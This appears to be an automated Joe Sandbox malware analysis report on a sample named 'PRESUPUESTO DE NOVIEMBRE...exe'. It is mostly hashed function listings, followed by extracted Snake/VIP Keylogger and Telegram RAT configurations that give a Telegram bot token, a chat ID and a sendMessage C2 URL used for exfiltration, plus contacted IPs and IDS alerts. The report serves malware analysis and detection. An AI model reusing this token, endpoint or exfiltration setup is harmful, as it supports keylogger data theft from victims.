Function 0300D548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ba8e0256957b677981b924eae913f42f917704fc1269a2919bce7f615345ab
Instruction ID: be1e9d17cd3dea29895b4fac81cb2675a118d73c5d2bb343684318d1ea57bb09
Opcode Fuzzy Hash: 89ba8e0256957b677981b924eae913f42f917704fc1269a2919bce7f615345ab
Instruction Fuzzy Hash: DD519574E01218DFDB54DFA9D98499DBBF2FF89300F249169E819AB364DB30A901CF50

Function 030041A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96874269ec5e566406e0719e19bebf9041e6ef85a24e13e47defb395136f772f
Instruction ID: 5ab169818dd45c1e1c17ec8d4c03a4cca08cc9a6388cd658d1ace6ed58507a43
Opcode Fuzzy Hash: 96874269ec5e566406e0719e19bebf9041e6ef85a24e13e47defb395136f772f
Instruction Fuzzy Hash: 3751A574E01208DFDB18DFAAD58499DBBF2FF89300B609469E809AB364DB35AD41CF54

Function 0300D558 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2da1f344222e5c14a5d03f60c42956829df338934aa1fef3a97b7dee17c026c
Instruction ID: d0ba4859b7dbf8b2c31048b518bd586f3eab1fe744632cf8989d679a403026bc
Opcode Fuzzy Hash: b2da1f344222e5c14a5d03f60c42956829df338934aa1fef3a97b7dee17c026c
Instruction Fuzzy Hash: 10519674E01218DFDB54DFAAD98499DBBF2FF89310F249169E819AB364DB30A901CF50

Function 0300A303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4cf71ce8555b3705e36b7f6490d2d638ff0f5e120007060aeab313343f47274
Instruction ID: 80e4f7c2b1f3a3c775f7b59aebafb7994fc5495ebe6c45517728d3896a037eb7
Opcode Fuzzy Hash: e4cf71ce8555b3705e36b7f6490d2d638ff0f5e120007060aeab313343f47274
Instruction Fuzzy Hash: 3941AE35B01349DFEF11CFA8C844A9EBFB2BF89310F088555E905AB2A1D375E954CB64

Function 03005658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7631e4b7f46aab7d72dcefabdd24cd558af91e7d96ef8b2e9dc45f939b47baa
Instruction ID: ef92f4dd4deadb2fb18204329921aa77e68410de105e8553d90d6af7d7c6adc3
Opcode Fuzzy Hash: b7631e4b7f46aab7d72dcefabdd24cd558af91e7d96ef8b2e9dc45f939b47baa
Instruction Fuzzy Hash: 92317E7160520AEFEF059F64D845AAF7BBAEB49200F044468F91987394CB75CDA1DFA0

Function 03008370 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9887c5feded1c30663b4abe466f461c57be85b7a230c1ad34bb96f10d0b64523
Instruction ID: 621ac388222187efe2461a16b19c71fd2a96d770601189d95ff783edc70b5ef8
Opcode Fuzzy Hash: 9887c5feded1c30663b4abe466f461c57be85b7a230c1ad34bb96f10d0b64523
Instruction Fuzzy Hash: 1321CF313062054BFB549A25C88573E66EABFC4748F08C479E906CBBE8EE25CC42D682

Function 03008380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822c08bdbcfbc3951d1cd8102bd1861ccc77a2f968c33ebcb426b85f7f6db31a
Instruction ID: 08ea97cfc600c44228d20bb31b0e131068d133e77192c7076c4bb0c6a04977e6
Opcode Fuzzy Hash: 822c08bdbcfbc3951d1cd8102bd1861ccc77a2f968c33ebcb426b85f7f6db31a
Instruction Fuzzy Hash: 3B21AC303052054BFB549A25849473E66DBBFC4748F18C479E606CBBD8EE76CC82D782

Function 0300F71F Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e1634b15a1f282e74a858126fe355aaa9b97fd93ca96a3efe6c47ec796bc8b4
Instruction ID: 51c2fef09e6eef6aa359011ea1f375c35fffad1d33cfb870fd876db95970a7f5
Opcode Fuzzy Hash: 1e1634b15a1f282e74a858126fe355aaa9b97fd93ca96a3efe6c47ec796bc8b4
Instruction Fuzzy Hash: C4313430D023199FEB14CFA5C8487DEBBF2AF49300F50842AD814BB284DB75594ACB51

Function 030028F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18b4911d49b2e00306b5c46254d662ac7e7a5305a8e193782e0ad2d8799b3ae1
Instruction ID: c55742d6af500f559c9b92aee95663f13e496d35c885945b5c09497dd70a4b53
Opcode Fuzzy Hash: 18b4911d49b2e00306b5c46254d662ac7e7a5305a8e193782e0ad2d8799b3ae1
Instruction Fuzzy Hash: B821F131A00105AFCB14CF34C450AAE77B9EF8C224F60C459D8898B380EA35EE43CBD2

Function 03006300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e464fdec2f73dbf8068a0b9e6129b9b0ddf62fbacddbf29b02ec05a9a600d0
Instruction ID: 29b11d5c4dc2015291bc42c5c54e94301be09402273f58887a1fd05b4d7eec78
Opcode Fuzzy Hash: d3e464fdec2f73dbf8068a0b9e6129b9b0ddf62fbacddbf29b02ec05a9a600d0
Instruction Fuzzy Hash: 7621F03570261A8FE7249A39C45492EB7A7FF89760B088428E906CB3D4CF32DC12CBC4

Function 016AD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3749489714.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16ad000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c359bd5378c0d21511e7dd365395357d22b465e15c16f0d73e3cda6653e3a5
Instruction ID: 16d12b80246f252a18dff1b614f7ade566efe0e71980e78932e90af5eebd833b
Opcode Fuzzy Hash: 01c359bd5378c0d21511e7dd365395357d22b465e15c16f0d73e3cda6653e3a5
Instruction Fuzzy Hash: 92212271544204AFCB11CF68CDC4B26BBA5FB88314F60C5ADE8494B756C73AE847CE61

Function 03004285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 744e6f602c4192bf478f6cbdf7413abaef68c3259b4ff03558cbbbd0ad5b9a6a
Instruction ID: 53ce1aadce37581d3706350cddaf115734daa069551b6c21db96619b98217682
Opcode Fuzzy Hash: 744e6f602c4192bf478f6cbdf7413abaef68c3259b4ff03558cbbbd0ad5b9a6a
Instruction Fuzzy Hash: 1C31B578E11208DFCB14DFA9D68489DBBB2FF49304B2094A9E819AB364D735AD51CF01

Function 03005649 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24d39bd81d74eea9c905e9e7988a0d2fd647398e2694070cf028ec87f2c958b1
Instruction ID: fef01f3d4b8339fb7680a6a1d0b4e685e974222d8cd0d2fa178f68a878582b04
Opcode Fuzzy Hash: 24d39bd81d74eea9c905e9e7988a0d2fd647398e2694070cf028ec87f2c958b1
Instruction Fuzzy Hash: 6221057160A209DFEB01DF64D9457AE3BBAEB55204F044469F909CB394CB78CD91CFA0

Function 03009761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7d042942bf4289ae40b7e69fa3364272cb6f180d3f3c57295bdf4bb50e59eba
Instruction ID: f0e37fa31be0bbfb2aabf28489cdfa9c0828a5d14d23f8159728cb2088253706
Opcode Fuzzy Hash: c7d042942bf4289ae40b7e69fa3364272cb6f180d3f3c57295bdf4bb50e59eba
Instruction Fuzzy Hash: 38216D70E01249AFEB15CFA5D590AEEBFB6EF48204F148059E415E62A5DB30D981CB20

Function 030062F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bc5e7e23c90e5f45f60429f34c3d60a609f36f44c419f485aa32812691aef1
Instruction ID: e6c4bf9949d66e4ad3e11cbb675da06a303cdda1f9a19da3cf140ce7ad3d75a3
Opcode Fuzzy Hash: 34bc5e7e23c90e5f45f60429f34c3d60a609f36f44c419f485aa32812691aef1
Instruction Fuzzy Hash: 5511E3357066198FE715CA39D45452EBBE7EF857517094469E806CB3A0CF22DC1287D4

Function 0300F640 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42cb54b089c55210774e891632c467c8915c50cd3a0125308e0fbe97a91bd671
Instruction ID: 4fe792012263d201e8ed117a17d8ff7aeb8f025ed8e2e9b60ae19fa3410edd2f
Opcode Fuzzy Hash: 42cb54b089c55210774e891632c467c8915c50cd3a0125308e0fbe97a91bd671
Instruction Fuzzy Hash: D1216FB0D0020A9FDB15DF79D94079EBFF2FB41300F0485A9D0649B268DB756A55CB80

Function 030027F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b61f67071a29c2c5fa7acdfef3c4cdf7567ca2b1cf8fe572ef16e09a956ef9
Instruction ID: 264568ee7abd18e966ce9d95285f67bc033de81d5b9746e0bb071361aeadf352
Opcode Fuzzy Hash: b7b61f67071a29c2c5fa7acdfef3c4cdf7567ca2b1cf8fe572ef16e09a956ef9
Instruction Fuzzy Hash: 2821CF74D1160D8FCB40EFA9D9456EEBFF4FB09300F14912AE905B2250EB306A95CBA1

Function 0300F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3fbe47d60f1897d40f12967c96e3a92348d026505ea591055c482d3e80a2bc7
Instruction ID: 56f8511f4463e085d7367ca9c61470fbce7c7e207cb457b92688d81a65f3d8cd
Opcode Fuzzy Hash: f3fbe47d60f1897d40f12967c96e3a92348d026505ea591055c482d3e80a2bc7
Instruction Fuzzy Hash: FA112C70D0120A9FDB54EFB9DA4079EBBF2FB44300F14D5A9D0149B268EB746A59CB80

Function 016AD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3749489714.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16ad000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
Instruction ID: 03ab92693aea619c6808aa1524b47312bf6ae1b5a92428c93c40d3d15530caac
Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
Instruction Fuzzy Hash: 0111BB75544284CFDB12CF54C9C4B15BBA2FB88314F24C6ADE8494B752C33AE84ACF62

Function 03002800 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 302d70552872986ca8bbd4940086cdfd79b065274354b0c17351bc0f3b76380d
Instruction ID: 6d63635cff5fc068448137acd19513d627cdd8bdfa208381c192334acf1e9533
Opcode Fuzzy Hash: 302d70552872986ca8bbd4940086cdfd79b065274354b0c17351bc0f3b76380d
Instruction Fuzzy Hash: 7311BD74D1120E8FCB40EFA9D9455EEBBF4BB09300F14556AD909B2210EB305A95CBA1

Function 03005EA8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8546f96a3b389f516a93862a43472ca5ef984cda96f671531173ab1f79d37ca2
Instruction ID: 49f5b765ded0561362f1cd608c385588f59d01f4ead61dbd4fc741a784639f63
Opcode Fuzzy Hash: 8546f96a3b389f516a93862a43472ca5ef984cda96f671531173ab1f79d37ca2
Instruction Fuzzy Hash: BC01D6327041196FAF15DE999C01AAF3BEBEBC9650F188029F505D7294CE718D118BA8

Function 03005E98 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7746056c2820b3b0226c13b25855d57b7963c9c44a43f11cdc335106f81f5816
Instruction ID: 6ca1494828639a58c65bf8aa06207abcd24f71bf62f25d9d921d89a3d9d1fca3
Opcode Fuzzy Hash: 7746056c2820b3b0226c13b25855d57b7963c9c44a43f11cdc335106f81f5816
Instruction Fuzzy Hash: 6EF0F4336001086BEB15CE65DC01BDF7FBAEB88750F188025F904C7290DE71CC529BA8

Function 0300ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04bf89d2d18b9ecbc283927a5eecf22406f22a466bfb43aaf9e328c8ec8d3b25
Instruction ID: e24c5c5f4e79ad91089b5efd8af8210f4fd0d964fa931c9733bd24fd904f25cf
Opcode Fuzzy Hash: 04bf89d2d18b9ecbc283927a5eecf22406f22a466bfb43aaf9e328c8ec8d3b25
Instruction Fuzzy Hash: 4CF0F6313013144FAB15DA2E9854E2AB7DEEFC8A9174E8079F909C73A1EE20CC038380

Function 0300E8E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67961c83f3dede59f663c5d83c2d5df84b5c213757bf988b4d741c87a09f4d0e
Instruction ID: 4c5d169988291b128cd5b344b823cd3b3035fde19f78fbb6757c49c53b4761ff
Opcode Fuzzy Hash: 67961c83f3dede59f663c5d83c2d5df84b5c213757bf988b4d741c87a09f4d0e
Instruction Fuzzy Hash: EC012974D0020AAFDF10CFA5D941AAEBBB2FB48300F404425E914A3340D7796A66DF91

Function 030028AB Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1206f66d5b5a1e6cfd0c20df93ab7a6dd4b41590ec1046ec2dcfb51214e9c9a0
Instruction ID: 2d8e00d27b6e2cbf289b791b7875896d59bc7fe27c32749c7f77218ff897fdf7
Opcode Fuzzy Hash: 1206f66d5b5a1e6cfd0c20df93ab7a6dd4b41590ec1046ec2dcfb51214e9c9a0
Instruction Fuzzy Hash: 41E01232D2022A568B00EAA5DC454EFFB38EE95265B948626D55437140EB702659C7A1

Function 030028B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7674c7ac95eca938c0c73ac46b83395967f7b39b0c0be86ebce5cc4d230797d3
Instruction ID: 9881684e2ac1c203c46f0e201e92faa7cd433983539ecb409d52f3263c0f21e1
Opcode Fuzzy Hash: 7674c7ac95eca938c0c73ac46b83395967f7b39b0c0be86ebce5cc4d230797d3
Instruction Fuzzy Hash: 84D05B31D2022B57CB00E7A5DC044EFF738EED5265B908626D55437140FB702659C7E1

Function 03006739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418fd05aacdf8cd5498e3c1ab99a32f4436194ca9d45a046bbab3f31f6890e57
Instruction ID: ba1fdb542bd83b4e108834b581c1a992d588c0f70affa9c4dbf1233126a29835
Opcode Fuzzy Hash: 418fd05aacdf8cd5498e3c1ab99a32f4436194ca9d45a046bbab3f31f6890e57
Instruction Fuzzy Hash: 21D05E3144430F0BDB01A736EE477597B3AE790600F549620A0058A6ADDEB86C968650

Function 0300D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3fb0d10668cd1076bf75a879f41b85f7a34b9618f85d9099af7d4467fa39ff3
Instruction ID: 2b93471c398fff433510820d22082980f1d7623ac8fbe4ad68e87869cb09a35a
Opcode Fuzzy Hash: b3fb0d10668cd1076bf75a879f41b85f7a34b9618f85d9099af7d4467fa39ff3
Instruction Fuzzy Hash: F6D04239E5410DCBDB20DFE8E5854DDFB71EF59321F10642AE925A3251DA3054558F11

Function 0300AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9489bf722ea92f3d329e4978c8e11bd3107a39822d09a871dd9746208ffbf18d
Instruction ID: ba42f753c4da72d60b39905fac1ade94ebc95cebd7272d7a276b9e74af3d29b2
Opcode Fuzzy Hash: 9489bf722ea92f3d329e4978c8e11bd3107a39822d09a871dd9746208ffbf18d
Instruction Fuzzy Hash: 9BD0673AB400189FCB049F9CE880CDDFB76FB98221B448117FA15A3261C6319965DB54

Function 03006748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3c1e9eae6e2231ed5be108cb11d8875e0adf0a2a04c26ebd9477dac5248b4c
Instruction ID: d31031d8d54615b22b8ec31bad13289de37723e6cddda0c707b10e1ea5b0c3f9
Opcode Fuzzy Hash: 3d3c1e9eae6e2231ed5be108cb11d8875e0adf0a2a04c26ebd9477dac5248b4c
Instruction Fuzzy Hash: B6C0123044430B4FCA15E776EE46619372EF6A0300B409520B0054A6BDDFB91C9A4694

Non-executed Functions

Function 03006920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;_q, xrefs: 03006936
\;_q, xrefs: 0300695E
\;_q, xrefs: 03006952
\;_q, xrefs: 0300692C

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: \;_q$\;_q$\;_q$\;_q
API String ID: 0-294077808
Opcode ID: d138df4171d596b1e92b4c3ef0f263f801551b089dad6ff9c2c488979abfc4f8
Instruction ID: aa7e4d7d19357ad8c5cb91a7b8f14ad84019ffe0d576d50143a541ec0d19907d
Opcode Fuzzy Hash: d138df4171d596b1e92b4c3ef0f263f801551b089dad6ff9c2c488979abfc4f8
Instruction Fuzzy Hash: EF01B13274111D8FE7A4CE2CC554929B3EFEF88B60B1948A9E485CB7B8DA32DC51C750

Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8", "Chat_id": "8178506397", "Version": "4.4"}
Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8", "Chat id": "8178506397", "Version": "4.4"}
Source: PRESUPUESTO DE NOVIEMBRE...exe.7336.5.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendMessage"}

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49786 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49708 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49780 -> 188.114.97.3:443

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 0781EABFh	2_2_0781EBF7
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 0300F45Dh	5_2_0300F2C0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 0300F45Dh	5_2_0300F4AC
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 0300FC19h	5_2_0300F970
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C131E0h	5_2_05C12DC2
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C131E0h	5_2_05C12DC8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1D7F9h	5_2_05C1D550
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1CF49h	5_2_05C1CCA0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1F209h	5_2_05C1EF60
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1E959h	5_2_05C1E6B0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1E0A9h	5_2_05C1DE00
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1DC51h	5_2_05C1D9A8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C12C19h	5_2_05C12968
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C131E0h	5_2_05C1310E
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1D3A1h	5_2_05C1D0F8
